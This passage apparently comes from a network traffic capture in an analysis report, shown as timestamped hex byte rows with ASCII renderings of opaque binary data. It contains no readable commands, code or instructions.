30 8e ab 9d 8e 36 83 06 b8 e9 05 02 e0 d6 d3 00 10 13 f8 6c d2 c3 0b 16 31 b8 fd a7 b0 05 2b
                                        Data Ascii: T)S{[xl!*p>eV*n(2{RH}!qY(hZTjaz/\1?j+tt;b.du6#,$hQf"o0S ajV1bWibt]ze:aTWImt=OD0=vzr(#O"^Ia06l1+
                                        2021-10-13 14:33:05 UTC104INData Raw: 04 8f 10 f2 6c eb 6f e1 61 bb 05 41 14 5c 3f bb d4 86 2a 50 7c 16 dd 1a 3e 22 ca 06 68 2a 01 62 6a 80 75 4d 05 79 71 1e 11 cc 35 c8 02 31 55 81 b8 7b 91 1b 55 71 3e ff 5e 07 8d 67 03 eb e7 0a 2b ab 20 22 36 87 f4 56 1d 56 49 ba 60 21 2f 18 b1 fa d7 fa ad 20 95 42 68 16 58 62 4c 86 0f f1 78 64 ed a6 a1 a7 98 7f 8d 66 a8 de bb a5 a0 f3 60 a2 97 34 55 dd 05 0b 2b 88 45 b5 bd 00 dd be 61 b4 ac 92 1a e5 c5 35 15 d0 fa 32 e9 63 82 12 3a ed 55 f8 73 93 27 b5 11 f8 c1 c6 6c 2f 63 fd a2 7c a4 3e ef 01 19 b8 04 d5 21 c4 47 05 1b 3b 87 de 78 ae a2 ee 4e 8a dd 2c 18 bf af 8e 81 14 a0 3b ba 8a c7 78 34 f9 79 cb ff 46 9a 67 82 3a 11 c7 f1 36 fd b4 ab da ba 20 c3 c9 1c 1b 09 c8 5c 01 ae 22 6c 76 bc 24 c9 83 94 c5 fe 0d 55 20 b7 c0 a8 ff 82 5f 2b ef 2d 4a 78 c1 66 e0 0b
                                        Data Ascii: loaA\?*P|>"h*bjuMyq51U{Uq>^g+ "6VVI`!/ BhXbLxdf`4U+Ea52c:Us'l/c|>!G;xN,;x4yFg:6 \"lv$U _+-Jxf
                                        2021-10-13 14:33:05 UTC105INData Raw: c6 24 7e 07 0b 17 17 40 d5 3e 57 c5 ac f4 d2 31 7b 36 05 9a b7 e8 aa 47 99 25 fe f8 d2 f6 16 b8 e7 c6 bc 0e fc d6 e6 cb ed 6a 50 f1 95 e2 e3 76 2f 76 6d 6c be c7 9e dc e0 05 3c 31 ae db 30 e5 98 0f 55 1c a9 42 bf 0b 6f 92 15 17 72 09 85 be 5b 8d 7a 1b 7b cc c2 06 d4 1d 6c 3c 57 a6 ff 96 5c 65 58 21 13 f4 83 a1 20 9b 9c 25 1c d8 e5 11 06 dc b1 4c 94 7f 29 c2 2c 73 b3 60 b2 4c d7 42 05 2c f1 d1 1c 6f 6b 45 1d d3 d8 fd 16 4e 71 18 15 d4 a1 4c 7b f9 1e 2e 5c 3a 3a 69 23 c5 fc 27 f2 93 31 c3 ea b7 08 01 90 7d 9a 33 10 32 3a 26 67 01 f8 43 fd 48 fa 6b d1 24 d9 f9 88 b0 8b 9e f8 fa f0 4a 80 ca 3b 63 d8 7a 35 92 2d 41 d4 ff 48 8e b1 02 bb 0a 1c 5a ac 39 cf a9 4e 47 ea 72 11 eb 3d 90 f1 6f 75 31 88 ab 73 f4 99 5d 6f 02 bc 9d d7 72 55 68 af 08 e8 44 0e 61 05 7d 0b
                                        Data Ascii: $~@>W1{6G%jPv/vml<10UBor[z{l<W\eX! %L),s`LB,okENqL{.\::i#'1}32:&gCHk$J;cz5-AHZ9NGr=ou1s]orUhDa}
                                        2021-10-13 14:33:05 UTC107INData Raw: 7f 8d 71 9f b4 32 ac 76 f2 25 20 56 16 0b 70 0b 7a 49 9f 6c f5 6f 7c 4e f5 58 0b ec 03 c4 9b 70 d1 55 87 91 9b f4 e0 11 a2 81 68 c9 8c 03 18 a0 25 e7 7d 9a 6f 5f 64 23 5a 34 8a 48 3e 64 be 93 4f 04 8b 12 96 61 f9 67 e5 66 a2 1e f8 85 06 13 b6 d6 a6 3e 2c 1d be dd 1e 3d 2b aa 85 62 2a 1a 4c 62 83 55 6e 2b 10 7d 64 1f c9 5a 4a 17 26 2c 06 d0 46 f3 e9 b5 84 f3 fb 76 21 85 78 1a 3d de 26 26 b0 f8 33 27 ee e6 83 a3 b5 56 ae 73 29 2f 09 ab e5 f4 04 1a 0d 99 40 a3 13 37 b6 41 86 09 ee 46 77 e5 a7 a3 9f 80 81 a4 4a a7 dc c8 ab a1 e2 72 c6 3a 2d 55 d0 1f ee 39 ac 47 bc be 1f fb 56 9e 99 90 92 76 e0 c4 32 09 27 94 80 e9 48 8a 26 fb fc 26 e2 63 9b 3f 61 6a d6 f9 d2 3c 54 70 fe bd 62 9a c5 91 fe ec 6f f9 c2 29 c2 7e b3 04 22 73 a2 73 a1 a1 ba 75 8f a0 61 07 be 66 8b
                                        Data Ascii: q2v% VpzIlo|NXpUh%}o_d#Z4H>dOagf>,=+b*LbUn+}dZJ&,Fv!x=&&3'Vs)/@7AFwJr:-U9GVv2'H&&c?aj<Tpbo)~"ssuaf
                                        2021-10-13 14:33:05 UTC108INData Raw: 00 50 5c 8c 60 fa 5e 47 1d 6b 5d 47 7c e2 b0 89 aa d8 59 d7 67 35 95 b9 9f 50 0f 10 b1 dd 29 96 f8 cd 46 aa a9 43 c7 19 e9 17 2a e5 47 84 91 16 d1 b9 50 a5 57 2e 61 f1 a6 78 2e 88 8e 4a fe 4f 5f d4 13 94 10 03 11 a4 59 ce 3a bd d0 a8 59 d7 4a 6c 1f b4 9e a2 8c b5 e2 ad 0c ea e4 fa 0a 1a a7 fa 2e 30 25 f5 de f6 d8 c8 35 67 4e 86 ea e9 73 0f 98 7e 92 b9 fd 0a de e3 0d 22 29 6c e7 23 47 98 05 77 9c 1b 42 b5 7c 66 22 15 13 67 2b f8 49 a4 63 75 10 5c c0 c7 2a c6 0e e2 33 48 b2 28 aa 73 70 70 88 6e e8 88 89 7e 84 8c 3c 1e 06 e4 3c 35 15 b0 60 95 71 37 e0 8f 49 b3 6a b3 8e c4 4c 2f 3d f9 ce 47 8d 6a 69 15 db cf 2b 1a 51 6a 0b ee d5 b0 44 97 f3 e0 2f 60 36 33 76 21 81 e1 d9 16 5c 2b cf 7d be 08 10 72 64 64 23 14 cf 3a 25 ef bc e0 e2 cd 93 e9 68 f5 11 ca f1 82 8c
                                        Data Ascii: P\`^Gk]G|Yg5P)FC*GPW.ax.JO_Y:YJl.0%5gNs~")l#GwB|f"g+Icu\*3H(sppn~<<5`q7IjL/=Gji+QjD/`63v!\+}rdd#:%h
                                        2021-10-13 14:33:05 UTC109INData Raw: 23 b6 4b d2 50 7c f9 30 f6 aa 15 0f 6b 03 cf c9 67 e8 d9 69 30 ed 50 d1 d8 a2 e6 ba d9 0f 64 4d 54 52 70 93 13 be 0d 84 e6 bf d5 9a 9d a5 89 d9 c1 53 69 ab 02 6e 3f ad 2a 85 b0 14 d8 ef 3f 01 87 13 8c 7b 13 33 32 ac 77 e4 0d bc 57 14 01 5c 0f e7 42 41 1f ef 7e 74 33 47 58 0b e8 0d d5 9f 67 bb 8f 30 86 4f 79 cb 11 1b 81 15 d9 17 03 1c a2 0d eb 7c 9a 7d 56 72 4c ca 36 8a 42 03 56 cc 9d bb 06 8f 10 01 71 f8 76 ff fd 98 1a 4f eb 4e 1a c5 6e 80 3c 5d 00 b9 cc 1c 20 15 41 17 60 2c 07 e7 72 89 8b 4d 3a 65 62 6b 09 dc 3c 6e 04 28 35 1f ab 74 8f 03 5d f6 02 f7 5e 17 96 68 01 05 f0 31 ba ab 36 24 19 63 e0 a9 e8 8f 47 be 65 b9 03 16 a8 ea e2 9e 84 1d 99 40 61 c2 25 b6 4d 9d 21 fa 5c 77 ef 8e 84 ae 82 8b f8 58 a7 dc db b8 a8 ec 04 c7 00 3f db 60 1f c6 b5 ab 45 a4 b4
                                        Data Ascii: #KP|0kgi0PdMTRpSin?*?{32wW\BA~t3GXg0Oy|}VrL6BVqvONn<] A`,rM:ebk<n(5t]^h16$cGe@a%M!\wX?`E
                                        2021-10-13 14:33:05 UTC111INData Raw: ae 26 b8 bd 11 b5 bf 02 c6 4b 85 1c bd 13 5a bd 55 a1 56 55 30 c3 2f d2 cc 8f ee 99 a7 9a b8 00 d0 c6 3a 3b eb 6d 3d 15 f7 67 ca e1 82 84 29 86 8d 03 74 ed 63 41 b0 3a 7f 28 f2 e7 22 48 ae 27 36 76 46 4c 8c 85 fb 5e 47 64 26 58 47 76 cb 15 9d be fa d6 c5 76 3b a9 98 74 54 09 79 67 52 2e 9c 97 d9 52 be b7 60 75 1d 86 dc 00 f4 4d 83 b3 ff da ad 7e 34 c0 2e 67 ec 44 07 2e 88 85 52 eb 58 34 a4 3b 64 1e 2e 88 d8 44 db 28 85 c3 91 fc b8 1d 66 37 0f 42 a5 8c 47 f5 a3 1c da f0 d2 ed 0d a2 d4 32 b8 22 f3 d4 df f4 dc 21 45 33 86 ec c9 66 3b 69 7a 90 bf f3 87 b4 66 0d 2f 3d 78 f3 0b e4 98 05 7d 21 3e 42 a0 6c 4e 93 14 08 5d 19 96 0c 5b 9c 72 eb 74 32 d2 02 cb 1d 6f 32 5c 9a eb bc 67 6e 70 3a 6e e8 88 ac 5a 17 8c 36 1e d4 fd 0d 35 2e b5 60 99 6b ac ed a7 71 b2 79 bf
                                        Data Ascii: &KZUVU0/:;m=g)tcA:("H'6vFL^Gd&XGvv;tTygR.R`uM~4.gD.RX4;d.D(f7BG2"!E3f;izf/=x}!>BlN][rt2o2\gnp:nZ65.`kqy
                                        2021-10-13 14:33:05 UTC112INData Raw: fa 28 39 43 df 77 2a 8e d3 5b 7a 37 89 1f a1 d2 15 03 f1 d8 c0 1e c6 03 d1 76 d6 d7 1c 16 31 b6 c3 9e 06 b3 03 16 f3 a4 05 ea 28 02 b2 7e b5 51 ae 69 bd 22 e4 ec ce 57 70 16 50 0c 7e 58 2d 63 04 2f ad 57 a5 6d 13 33 33 99 f7 0a 37 7b c9 88 c8 62 e8 d9 6b 2f c6 50 db f0 b4 80 ba df 25 4a 4f 54 79 1f eb 13 b5 07 ac d3 85 d5 90 8e ae 9e ca c9 6b 38 aa 02 6c 2e aa 28 ba 87 15 d8 c1 51 ca 85 7d 87 a1 0b fd 25 76 60 32 80 a9 57 16 00 4f 06 7a 52 46 1d 8c 49 75 33 e0 36 c0 ea 01 df 45 7f 63 98 ea 95 5c 6a c1 3a 9a 91 1c c8 87 01 1a cd 94 eb 7c 90 63 47 7a 94 d2 e0 9b 48 00 be 13 85 59 6b 7b 11 ed 77 d0 7f e0 70 b9 32 18 e8 5d 15 9e f2 82 3c 51 7c c7 dd 1a 3e 9f d4 1f 77 fc 03 60 64 83 9a 5d 18 a9 62 6c 37 c4 35 cc 3e 30 37 19 34 cc 8c cd 59 69 3e fb 66 af 85 78
                                        Data Ascii: (9Cw*[z7v1(~Qi"WpP~X-c/Wm337{bk/P%JOTyk8l.(Q}%v`2WOzRFIu36Ec\j:|cGzHYk{wp2]<Q|>w`d]bl75>074Yi>fx
                                        2021-10-13 14:33:05 UTC113INData Raw: 3e 1a f2 36 66 34 5d 12 98 30 69 65 6e 26 c9 69 8b d4 fc 10 5e 1a a7 df 93 16 7d 72 12 e4 2d 97 7b cf 67 c8 9b bf fa 6f ff 84 e7 6e f1 38 98 a4 79 cd 7b 1a 25 49 95 fb 9a ba 95 5a c5 aa 14 8f 41 a9 a7 44 bc 00 9b d7 d7 c4 4d fc b0 65 7c 81 b3 5d c4 e2 38 cf c8 22 aa 40 cd fd 98 ac 82 dc 7c c8 38 31 04 e3 4f 72 d2 f2 01 b9 37 13 58 50 db 94 10 7e fe 76 4d d1 97 81 29 d4 81 03 ec ad 2d 1a 45 68 5b af 8d ef 55 5e 31 18 5b 6b 6d e4 cb 61 bf f0 fc c6 6f 50 53 93 71 5e 10 2d b4 5b 2e 87 f3 d3 67 40 bc 47 6d 21 e1 1f 02 f4 58 b2 88 11 d9 bc 73 55 58 d0 66 ca 3f 78 41 72 8e 59 fc 49 81 d5 ed e9 3f 03 17 07 44 d5 22 ba cf 80 eb dc 55 45 c9 04 b2 a9 85 90 f7 50 a5 fe f4 cd c3 0d ac fc 29 b6 3d dd 20 f6 e0 d0 30 45 f7 c6 d8 1e 98 d8 76 53 81 b4 eb 96 d2 fc 18 dd 3c
                                        Data Ascii: >6f4]0ien&i^}r-{gon8y{%IZADMe|]8"@|81Or7XP~vM)-Eh[U^1[kmaoPSq^-[.g@Gm!XsUXf?xArYI?D"UEP)= 0EvS<
                                        2021-10-13 14:33:05 UTC114INData Raw: 49 d9 bb 26 35 2e f0 f3 a2 e2 b8 5d b1 31 d7 2e 25 9f ec e3 d2 ab 63 65 41 6b 14 30 d9 b1 87 09 e8 33 a7 e7 a6 ba b8 58 ee 5d 48 a7 d6 af 51 a0 f3 62 1b 1c 29 16 c4 03 10 29 8b 5a 85 4b 1e d0 4d 63 16 0b 99 79 3d 1e 26 15 c6 b7 bf e0 63 99 06 07 d1 a3 f9 4e 96 38 c5 a7 dd c9 13 e6 47 7e e3 92 6b b9 7e 80 f5 f9 7a e7 c7 05 c9 55 83 b3 2b 61 09 8e b3 a5 a1 61 9c b8 51 12 b5 b0 a7 60 0f 9f 20 b9 92 d8 b8 5b ef 8f df 3e d8 b9 67 93 33 02 fc 21 24 da b6 91 d4 9d f2 c1 37 cf 22 01 46 eb 11 10 96 65 12 6a fe f7 10 69 3a 10 04 4d 18 a7 c0 be e3 63 49 f9 ec 19 57 7f a9 8c 1f 0a 6f fb e9 27 4d 50 6d f7 57 55 9b 6a cc 64 13 3d 5d d4 14 90 8e 49 5c 86 5f 66 8f 45 ae ce b3 a4 13 96 b8 16 cd 52 cf 59 be 3f 40 a0 55 cd e3 40 e6 58 4d 57 5e 8f e8 8c 96 80 dc 63 c1 cd 2f
                                        Data Ascii: I&5.]1.%ceAk03X]HQb))ZKMcy=&cN8G~k~zU+aaQ` [>g3!$7"Feji:McIWo'MPmWUjd=]I\_fERY?@U@XMW^c/
                                        2021-10-13 14:33:05 UTC115INData Raw: e6 9a 7e 3e b5 ab 46 a2 ac 59 45 98 38 6d 11 97 cb 1e 9d 72 00 5e 32 c3 2a d3 28 6a 34 ca b3 29 be 90 64 58 3a 78 fb 87 99 48 85 8c 36 14 c9 f1 02 e3 23 9c 6a 99 6a 1f 88 a6 71 b3 76 aa 55 c4 5b 00 23 07 cf 2a 83 68 6b 6e 9d ce 2b 1e 52 bc 76 5b d5 b0 40 7b fb f3 2a 70 27 36 6c c5 80 cd c9 0f 17 69 ce f9 bb 0a 6b de 65 64 36 e6 36 25 36 ec b6 f3 9c f2 6c e8 40 d3 3d dd 2b 9f 77 0e aa ec 04 f0 6a 89 da 36 7c c3 a9 04 e7 2e 6d db fa 40 8b b7 14 b3 1b 08 4d ba ce 30 84 64 40 c3 65 04 f2 ee b8 6b 68 6a 31 7b b5 40 70 91 5d 7e 08 dd 26 d7 5e 59 52 ff b1 16 bb 11 7a 1b 7b 32 fe 5e 06 4c 43 83 38 cf e6 1c 1f fc 15 b0 7b 73 39 f4 cc 66 ce 61 3e 6e 05 f8 dc 1a 95 e2 3b 40 dc b2 35 90 c6 36 99 59 8f 1b b7 fc 7c 47 f0 d2 c8 08 ea 10 af 35 d1 b8 01 26 13 be 81 6c 06
                                        Data Ascii: ~>FYE8mr^2*(j4)dX:xH6#jjqvU[#*hkn+Rv[@{*p'6liked66%6l@=+wj6|.m@M0d@ekhj1{@p]~&^YRz{2^LC8{s9fa>n;@56Y|G5&l
                                        2021-10-13 14:33:05 UTC116INData Raw: 9d 5f 09 90 1f 13 70 d4 6d e2 49 3c e4 b0 15 42 03 a5 d1 80 2d 5a 0c b2 23 1b 18 37 d4 10 77 fc 03 6f 6a 87 98 41 29 7a 7e 7a 0b 33 34 e0 1b 37 20 07 20 53 8a 17 4a 71 21 e8 4b 05 88 78 01 18 f8 d8 27 96 20 18 9d db e9 ba ef a9 47 a3 6b d7 2e 25 ae e7 8f 4d ad 0c 9d ce dc 08 e1 a1 97 91 df 63 77 77 e5 a7 bd b6 91 8c 8c 5b aa c3 d0 55 a0 df 11 d9 c1 b7 55 d7 09 38 2c 80 45 ae 9d 03 ff 40 66 81 31 97 61 eb c5 26 16 c8 92 ba ed c1 99 0a 0f f6 75 e9 62 9b 31 e9 01 d3 c9 cd 2f 5f 6b f7 b6 50 33 7c 91 f8 f0 ca 1e c6 29 c5 42 19 10 0a da df 54 aa 89 af 5f 8f b9 f3 12 b9 bc 8c 8f 08 a7 27 a3 16 e0 6e ca f9 46 c0 f9 5d 84 70 0f 23 06 f4 18 ab c0 be 98 c8 1e f1 37 21 cb 96 09 c8 56 34 81 30 7f 07 bc 35 c4 7c 8e 3b ee 37 58 1f 86 df b4 fb 71 5e 16 e0 2a 52 86 c7 5c
                                        Data Ascii: _pmI<B-Z#7wojA)z~z347 SJq!Kx' Gk.%Mcww[UU8,E@f1a&ub1/_kP3|)BT_'nF]p#7!V405|;7Xq^*R\
                                        2021-10-13 14:33:05 UTC118INData Raw: 97 5b c2 31 7c 49 15 39 34 51 d9 2b a9 d5 85 e3 29 4b 4a 32 11 b4 b8 95 9c e0 97 31 fa 0e d3 cb 1d bf ef 3d bd 33 f0 c8 09 cd f0 22 58 fe 83 ea f2 62 3d 97 7b be bd c0 85 f2 58 0f 4c f4 78 f3 01 88 bb 05 7d b4 ab 42 b5 76 0e c8 36 13 6d 11 96 b6 5b 6c 4d 5d 5c a3 c3 2a ca af 78 e2 c5 99 29 be 66 6f 4e 2c e0 5f 95 7b 37 80 81 1d 36 da fd 01 c5 3a df 8f 9f 7c 2b e6 a0 78 bb 4a ba 52 c4 4a 2d df fb ce 0c b9 89 6b 15 d1 53 22 0d 87 67 02 0c d0 81 9d 63 d8 e0 3c 40 35 33 b4 3b 81 e1 24 0d 6c 3f d9 ea ba 30 be 98 64 64 32 2d 39 21 2c 17 b7 ce 92 e3 83 ed e2 6a 0c a8 ee 82 b2 86 81 fd 01 ec 98 91 e5 26 7b fa bb 18 19 29 49 52 c7 4d 91 a5 7e 67 08 0d 58 95 2e 22 ad 62 59 ec 60 f0 e0 c7 bd 6c 60 6e 28 80 b4 68 e2 86 a3 7f 26 a5 7b c5 5b 5d 41 81 ef e9 ba 39 7b 7e
                                        Data Ascii: [1|I94Q+)KJ21=3"Xb={XLx}Bv6m[lM]\*x)foN,_{76:|+xJRJ-kS"gc<@53;$l?0dd2-9!,j&{)IRM~gX."bY`l`n(h&{[]A9{~
                                        2021-10-13 14:33:05 UTC119INData Raw: 10 80 69 a5 94 17 25 34 bb fa e3 0d bc 56 05 1f 4d 11 7a 6b 64 1a f7 78 d6 22 fa 4d 1f fc 29 76 9f 67 b1 9e 37 92 65 96 cf 11 a4 97 98 de 8d 03 1d b1 41 f8 63 8c 43 70 77 4c cc 94 9b 5d 0c 72 d1 b5 ed 04 8f 1a c5 4c fa 67 eb 58 02 1a 4f e0 64 de b7 dc 80 35 43 3b 7c de 1a 32 2a 48 12 60 2a 11 79 55 98 ab 5a 3f e7 4c 65 1f cc 97 dd 35 32 32 04 92 d8 9b 17 40 6f 05 34 5d 16 83 6f 9d 12 e6 26 27 a9 07 22 10 d2 f6 25 dd a9 56 af d1 38 0e 1d ad f1 dc a7 ac 0c 93 54 43 d1 34 b6 4b 91 84 e9 5c 77 e4 b5 92 be a0 97 9b c6 98 dc c0 aa 03 e2 46 d9 05 22 7d 74 08 10 32 94 6d 67 b6 1f fa 57 ed 9f bc 90 60 f8 e7 24 32 cf 83 20 d4 63 88 0c ba ef 7e ec 76 8f 13 e8 10 d4 db d1 14 90 79 fc a4 6e 3f 79 91 fe e7 53 0d d2 01 67 56 0d 0e 0a 68 df 54 aa b2 b2 56 9b 9b 92 00 be
                                        Data Ascii: i%4VMzkdx"M)vg7eAcCpwL]rLgXOd5C;|2*H`*yUZ?Le522@o4]o&'"%V8TC4K\wF"}t2mgW`$2 c~vyn?ySgVhTV
                                        2021-10-13 14:33:05 UTC120INData Raw: 2d 10 87 b5 4a a4 8d fc 76 66 0e e6 5c 6f 58 e3 a4 97 96 c1 fa d7 6d 06 48 93 71 54 19 9b 8c 50 2e 97 eb d7 50 96 9a 6e 64 1f c1 39 02 f4 4d f7 68 1b d9 ab 6b 5e 42 3a 08 17 2a 7f 28 e7 69 5b fa 54 48 e7 03 6a 15 03 17 14 6d e2 c9 ab c4 8a 76 fd 4a 66 2c 16 82 b3 9a 8d c8 ae 30 ed f6 c4 6a 19 a7 fc 39 a9 36 e1 f6 54 cc dc 2b 67 c5 83 ea e5 71 0f 81 78 92 b5 fa 9b cd cb 25 27 3d 7e e5 86 e3 98 05 7c a0 bf 56 9d d5 4e 93 1f 3b 44 14 96 b0 4d b4 9a 06 74 38 eb c3 c2 18 65 25 54 a6 01 96 63 64 5e 3d e3 ef 82 a1 25 90 98 22 3c 7b f4 19 17 0a 9a 65 9f 7a 37 c2 4f 73 b3 60 91 b9 c6 4a 0f 15 48 ce 06 9b 46 74 04 c7 db 03 9d 52 6a 0d 0b 59 b7 44 64 f3 f4 3b 64 1e 90 76 3b 8b c9 44 0d 6c 24 dc e3 ae 14 04 b0 4c 60 32 3a 2a b3 22 e9 b6 e3 8d fe 86 c1 cf dd 3e c0 d9
                                        Data Ascii: -Jvf\oXmHqTP.Pnd9Mhk^B:*(i[THjmvJf,0j96T+gqx%'=~|VN;DMt8e%Tcd^=%"<{ez7Os`JHFtRjYDd;dv;Dl$L`2:*">
                                        2021-10-13 14:33:05 UTC121INData Raw: 28 f8 2e a7 5c b0 04 ad fb 31 93 92 eb 0e 61 d9 f4 2f 7c f3 cc 54 37 d6 47 ce fb 1d 83 96 c5 1c 74 5c 58 57 5d 96 13 b3 25 aa e4 87 d3 b2 71 ab 89 d3 ae 77 6b ab 04 73 1b be 3d c1 a1 03 c7 d3 c0 00 ab 72 85 53 9c 24 32 a6 4d 5b 0c bc 57 09 16 4f 18 6c 52 56 03 09 7f 58 35 e6 4a 1e f5 12 c2 9f 76 ac 90 29 78 4c 55 df 00 a4 91 11 f1 eb 02 1c a8 31 1e 7d 9a 6d 45 60 53 d0 25 9d 42 09 71 da 90 b0 05 a3 07 fc 74 d0 4c e4 70 b5 32 6b ea 5d 19 9e 49 80 3c 5d 00 b7 c2 14 27 2a c5 04 77 35 1c 94 74 a5 8d 67 6a 74 7e 76 08 cd 24 db 0b d8 27 3c b3 43 3e e9 b5 84 32 fe 4d 01 85 69 07 0a c2 d8 27 96 3a 22 21 d5 eb 81 cf ac 56 a8 5b 07 2d 09 bf cd 18 06 ac 06 f6 66 69 12 31 a9 68 95 1e ee 4d 60 fa 8f 4e ae ae 8b 9d 5e b0 0a d3 bf be d9 77 da 11 27 42 c8 16 ee 39 ac 6b
                                        Data Ascii: (.\1a/|T7Gt\XW]%qwks=rS$2M[WOlRVX5Jv)xLU1}mE`S%BqtLp2k]I<]'*w5tgjt~v$'<C>2Mi':"!V[-fi1hM`N^w'B9k
                                        2021-10-13 14:33:05 UTC123INData Raw: 71 46 ae ce ab b3 11 93 c6 4b c7 4d f2 b6 b0 3b 4c b3 5d c8 f9 5c 43 eb 20 ac 59 9c fe 82 bc 9b b8 4b d2 c6 36 39 fd 57 69 2c dc 0d ae e7 aa a0 5f c4 8b 2b 99 fc 67 4c a1 8d 7d 28 fe 99 2b 58 a5 05 37 5f 57 4e 8c a3 fc 5e 47 23 0a 58 47 76 8c 82 9f be f6 eb c7 64 50 ab 93 71 52 09 07 b7 3f 38 97 f8 c6 8c b1 98 43 53 19 e9 17 11 e0 6f bc 9b 1a d3 73 78 5b 59 39 b1 f5 21 6e 24 99 98 67 8f a0 a4 3d 2a 71 03 d5 04 13 59 df 3f bf 4a 37 c5 3c b7 99 c8 03 b4 a2 c7 ad e0 86 34 ed f0 d2 b4 1e a7 fc 33 bd 22 f5 80 f7 cc dc 33 4f ed 86 f0 e3 67 26 69 7a 92 bf 76 87 d9 e3 60 22 3d 78 f9 09 e4 98 0a 7d b4 ab 58 b5 76 4f 88 25 1a 6d 4b 97 b6 5b 99 73 04 65 30 c9 28 d6 77 8e 35 48 b8 36 e1 54 6c 5a 3c 01 e0 83 a1 2e 8e 8a 1e 88 d8 f4 13 35 44 b1 60 95 71 52 cc a6 71 b9
                                        Data Ascii: qFKM;L]\C YK69Wi,_+gL}(+X7_WN^G#XGvdPqR?8CSosx[Y9!n$g=*qY?J7<43"3Og&izv`"=x}XvO%mK[se0(w5H6TlZ<.5D`qRq
                                        2021-10-13 14:33:05 UTC124INData Raw: e5 a5 91 c8 3b 50 e5 6c 26 7e c4 34 8e 3e 88 19 a6 f8 ff 17 bc d2 cc 1b ec 6c e1 76 d0 bc 78 69 30 bc fe 2b d7 fe 03 3e e3 89 11 ec 25 01 b2 6d b1 51 a2 7b d9 22 e4 e2 e1 4f 87 3f 52 f7 7f 54 03 6b 29 2d a4 d4 10 16 fc f8 31 9d ff 17 74 e1 de e7 38 4b b0 dd 43 3d ba 2f d0 d8 e7 81 ac db 76 1b 4c 54 7b 72 e8 93 b4 0d 80 ce 6a d7 9a 97 ad 9d 27 c0 45 97 aa 09 6b 13 80 28 c5 3e a3 a5 47 3f 01 83 7f 8f 00 91 24 32 a8 5f bc 0f bc 5d 6b 80 5d 0f 68 47 57 1d 8c ff 75 33 e0 5b 70 6a 00 d5 9b 4f 56 8d 30 8c 48 6d 35 10 b4 7e 14 d5 85 2f 5b a0 5b 67 cb e7 ef 57 72 48 c8 34 f1 c6 19 66 c1 b5 16 06 8f 1a 90 f2 f9 67 e5 75 a5 18 34 69 5c 13 b2 de fb b8 56 13 bb f5 f7 36 3d cf 17 65 a4 a7 17 f3 88 8b 48 2b 69 08 e3 1e cd 31 e4 4d 24 26 1a c7 fe 9a 17 4e 51 2d f7 4d 26
                                        Data Ascii: ;Pl&~4>lvxi0+>%mQ{"O?RTk)-1t8KC=/vLT{rj'Ek(>G?$2_]k]hGWu3[pjOV0Hm5~/[[gWrH4fgu4i\V6=eH+i1M$&NQ-M&
                                        2021-10-13 14:33:05 UTC125INData Raw: 98 c8 12 34 e3 37 23 92 22 8b 9f 21 68 16 26 01 e4 68 b2 d9 f0 2b 41 07 84 ed ad e8 7a 74 5d 93 ac 40 78 c2 6d 84 2f 44 f2 c7 55 a5 6d 72 fe 10 aa 9b 6a c0 51 51 50 cf d5 05 9f 88 2d 78 87 5d 33 91 58 e5 d7 b5 95 2d 9f b8 01 ec 2f 88 3e be 13 54 ae 54 54 cf 7a 3c ef 3d a5 40 d7 f1 9f 84 be d5 63 d6 ec 52 56 74 47 65 00 ee 02 34 c4 af 82 7b db 87 1c 11 e1 6c 6e e3 ab 7f 2e d2 d6 45 d0 af 2d 1e 45 5c d2 81 a0 f5 78 5e 00 f9 35 5e 54 ce a6 9d b8 da 98 a9 fe 3e 81 95 6e 58 95 33 8a 5c 08 89 f4 d3 20 a1 a1 43 49 1b e9 1b 28 9a 39 1d 9a 1a dd b2 75 d0 76 03 68 c0 34 72 0e 06 8f 59 fa 41 51 ea 16 66 14 05 3d 68 36 53 2f a9 c0 9f f4 4d 6f 4b 38 23 81 ac a6 01 e0 86 34 f2 fa fa ca 1c a7 fa 12 d3 5c 6c df f7 c8 c3 2e d5 c8 ab e5 c5 78 28 49 d8 92 bf eb 98 cb cb 20
                                        Data Ascii: 47#"!h&h+Azt]@xm/DUmrjQQP-x]3X-/>TTTz<=@cRVtGe4{ln.E-E\x^5^T>nX3\ CI(9uvh4rYAQf=h6S/MoK8#4\l.x(I
                                        2021-10-13 14:33:05 UTC127INData Raw: b3 34 2e 9e f8 6d c4 74 28 fe dd 98 f6 6f 75 3b 9d 9c 54 e5 91 5b 54 60 d8 fa d7 5e 59 4f b3 6d 32 96 1b 54 12 4a 3a 45 5d 06 46 58 a9 69 8a e7 1a 31 80 43 23 7a 73 16 96 b2 fd eb 48 39 4e cc cd c4 34 97 e2 3b 58 fd 45 24 94 c2 1e e4 48 10 18 b7 fe 1e 3b 6b f7 e1 17 c8 0d ed 56 46 ba 05 17 2d 94 d7 2b 07 b5 29 54 9f 38 04 ec 21 14 a0 f7 95 7c a6 20 bb 19 c4 7a e0 5b 79 23 6c 24 7c 5e 03 6d 6e 51 3e 5b a7 6f 63 c2 ab bc d0 1b 29 7e e4 c7 9f 61 e8 df 5a 1f ea 52 d1 de c9 ec c4 40 0c 64 49 4b 43 ea b6 3e ba 2b 9b da a7 73 98 9d a9 96 d0 e9 7e 6b ab 04 46 55 d3 b3 c0 b0 10 c7 f8 a4 24 aa 73 ab 64 2e 05 9d ae 77 e4 1a 94 7a 14 01 5a 25 06 3d d8 1e f7 7a 6b 0d 7e 7c 26 e6 27 ca a1 47 0b 8d 30 86 5a 51 e6 13 a2 86 3f b3 f3 9a 1d a2 5a f6 43 00 4e 7b 7c 6a d5 09
                                        Data Ascii: 4.mt(ou;T[T`^YOm2TJ:E]FXi1C#zsH9N4;XE$H;kVF-+)T8!| z[y#l$|^mnQ>[oc)~aZR@dIKC>+s~kFU$sd.wzZ%=zk~|&'G0ZQ?ZCN{|j
